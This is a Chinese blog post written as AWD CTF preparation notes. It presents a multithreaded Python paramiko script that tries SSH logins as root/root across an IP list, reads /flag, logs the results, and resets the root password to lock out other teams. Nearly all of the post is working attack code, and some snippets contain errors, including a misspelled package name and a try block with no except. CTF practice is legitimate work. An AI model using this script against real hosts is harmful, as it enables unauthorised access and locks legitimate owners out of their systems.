SSH爆破脚本编写小记\Python paramiko库的学习

前言

最近在紧张备战AWD线下赛，没什么经验，防止有全场密码一样的情况，直接写脚本cat全场flag，然后修改系统密码。

编写记录

paramiko的安装

pip install parmiko

简单的ssh连接例子

import paramiko
import sys
def SshCon(ip,prot,user,passwd):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(ip,prot,user,passwd,timeout=1.5)
        stdin, stdout, stderr = ssh.exec_command('df')
        result=stdout.read()
        if(result):
            print("Success")
    except Exception as e:
        pass
SshCon('127.0.0.1',22,'root','root')

• 从例子中不难看出，在执行一条shell后悔返回shell的执行结果，这个结果是字节类型，所以对返回结果处理时候可以转换为字符串类型。

• 修改密码只需执行一条命令

stdin, stdout, stderr = ssh.exec_command("echo 'root:admin123'|chpasswd")

多线程对多个IP进行爆破demo

import threading
try:
    import queue
except:
    from Queue import Queue
class Ssh(threading.Thread):
    def __init__(self,queue):
        threading.Thread.__init__(self)
        self._queue=queue
    def run(self):
        while not self._queue.empty():
            try:
                iplist=self._queue.get()
                self.SshCon(iplist)
    def SshCon(self,ip):
        '''略'''
def main():
    try:
        Myqueue = Queue()
    except:
        Myqueue = queue.Queue()
    with open("ssh.txt") as dic:
        for i in dic:
            Myqueue.put(i.strip('\n'))
    threads = []
    threadsCount=50
    for i in range(threadsCount):
        threads.append(Ssh(Myqueue))
    for t in threads:
        t.start()
    for t in threads:
        t.join()       

完整脚本

#!/usr/bin/env python
#-*-coding:utf-8-*-
import paramiko
import sys
import threading
import os
import time
try:
    import queue
except:
    from Queue import Queue
class SshSimplepass(threading.Thread):
    def __init__(self,queue):
        threading.Thread.__init__(self)
        self._queue=queue
    def run(self):
        while not self._queue.empty():
            try:
                iPlist=self._queue.get()
                self.SshCheck(iPlist)
            except:
                pass
    def SshCheck(self,ip):
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())  # 跳过了远程连接中选择‘是’的环节,
        try:
            ssh.connect(ip, 22, 'root', 'root',timeout=1.5)
            stdin, stdout, stderr = ssh.exec_command('df')
            result=stdout.read()
            if not result is None:
                stdin, stdout, stderr = ssh.exec_command('cat /flag')
                result = str(stdout.read(),encoding="utf-8")
                sys.stdout.write('\033[5;32m'+'[+]'+'\t'+ip+'\t'+result+'\n')
                with open(filename) as file:
                    if ip not in file.read():
                        f = open(filename,'a+')
                        f.write(ip+'\t'+result)
                        f.close()
            stdin, stdout, stderr = ssh.exec_command("echo 'root:admin123'|chpasswd")
            print(stdout.read())    
        except Exception as e:
            pass
            #sys.stdout.write('\033[31m'+"[NOT]"+'\t'+ip+"\n")    
        finally:
            ssh.close()
def main(threadsCounts):
    try:
        Myqueue = Queue()
    except:
        Myqueue = queue.Queue()

    with open("ssh.txt") as dic:
        for line in dic:
            Myqueue.put(line.strip('\n'))
    threads=[]
    threadsCount=int(threadsCounts)
    for i in range(threadsCount):
        threads.append(SshSimplepass(Myqueue))
    for t in threads:
        t.start()
    for t in threads:
        t.join()
if __name__=='__main__':
    if len(sys.argv) != 2:
        sys.stdout.write("Enter:python %s threads" %(sys.argv[0]))
    else:
        path="result/"
        filename=path+'/'+str(time.strftime("%Y-%m-%d", time.localtime()))+".txt"
        isExists=os.path.exists(path)
        if not isExists:
            os.makedirs(path)
        f = open(filename,"a+")
        f.close()
        main(sys.argv[1])